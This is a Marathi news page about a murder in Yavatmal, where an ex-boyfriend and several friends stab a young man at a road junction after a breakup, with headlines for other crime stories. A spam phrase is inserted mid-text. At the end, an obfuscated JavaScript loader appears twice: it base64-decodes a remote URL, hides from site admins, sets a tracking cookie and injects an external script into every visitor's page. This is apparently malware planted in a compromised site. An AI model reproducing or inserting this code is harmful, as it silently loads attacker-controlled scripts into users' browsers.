YAWATMAL EX BOY FRIENDl प्रेमातून सूड..! एक्स बॉयफ्रेंडने गर्लफ्रेंडच्या मित्राला भर चौकात संपवलं “यवतमाळ हादरलं…
YAWATMAL EX BOY FRIEND प्रेमात धोका मिळालेला तरुण किती आंधळा होतो.. याचं भयावह उदाहरण यवतमाळमध्ये समोर आलंय… ब्रेकअपच्या रागातून तरुणानं एक्स गर्लफ्रेडच्या बॉयफ्रेंडचा भर चौकात काटा काढला.. slammer692 beverly dangelo nude या घटनेने परिसरात एकच खळबळ उडाली..YAWATMAL EX BOY FRIEND
SHARAD MOHOL याच्या मारेकऱ्यांचा बदला घेण्याच्या तयारीत असलेल्या आरोपीला PUNE CRIME BRANCH कडून अटक
यवतमाळमधील संकट मोचन रोडवर प्रेम प्रकरणातून युवकाची हत्या करण्यात आल्याची धक्कादायक घटना समोर आली..
प्रेमात धोका मिळालेला व्यक्ती कोणत्याही स्तराला जाऊ शकतो, त्याचाच प्रत्येक यवतमाळमध्ये आलाय.गर्लफ्रेंडनं ब्रेकअप केल्यानंतर संतापलेल्या तरूणाने चार मित्रांसोबत मिळून मुलगी ज्या तरूणासोबत प्रेम करत होती, त्याला रस्त्यात गाठत त्याची भर चौकात हत्या केली.
यवतमाळमधील संकट मोचन रोडवर शुक्रवारी रात्री ९.२० वाजता एक्स बॉयफ्रेंडने मित्रांच्या मदतीने सूरज घटाळे याला चौकात गाठलं.
BEED CRIME: बीडमध्ये आणखी एका सरपंचाचा मृत्यू; आंबेजोगाई तालुक्यात एकच खळबळ
त्याच्यावर एकत्र सर्वांनी हल्ला चढवला, सपासप चाकून वार करत रक्तबंबाळ केले. सूरज घटाळे याला बेदम मारहाण अन् सपासप चाकूने वार करत जीव घेतला.
रस्त्यावर कुणीही नसताना एक्स बॉयफ्रेंडने सूरज घटाळे याचा काटा काढला. आरोपी सुरजवर चाकूने सपासप वार करून त्याच्या शरीराची चाळण केली..
BEED CRIME CASE: 5 लाख द्या, अन्यथा…बीडमध्ये संस्थाचालकाला धमकी;नेमकं प्रकरण काय ?
संकट मोचन रोडवर चार ते पाच जणांच्या टोळक्यांनी तरूणाची हत्या केल्याचं समजताच पोलिसांनी तात्काळ घटनास्थळी धाव घेतली.
पोलिसांनी याप्रकरणी तात्काळ कारवाई करत आरोपींच्या विरोधात गुन्हा दाखल केला.
संपूर्ण घटना सीसीटीव्ही कॅमेरात झाली असून या घटनेने परिसरात एकच हळहळ व्यक्त केली जात असून या आरोपींना पोलिसांनी ताब्यात घेऊन कठोरात कठोर कारवाई करावी अशी मागणी जनसामान्यांमधून व्यक्त केली जातं आहे..
AHILYANAGAR CRIME NEWS: इंस्टाग्रामवरील ‘तो’ मेसेज अन् गेला तरुणाचा जीव; पुण्यातील तरुणाची अहिल्यानगरमध्ये हत्या(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9+/=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9+/=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();
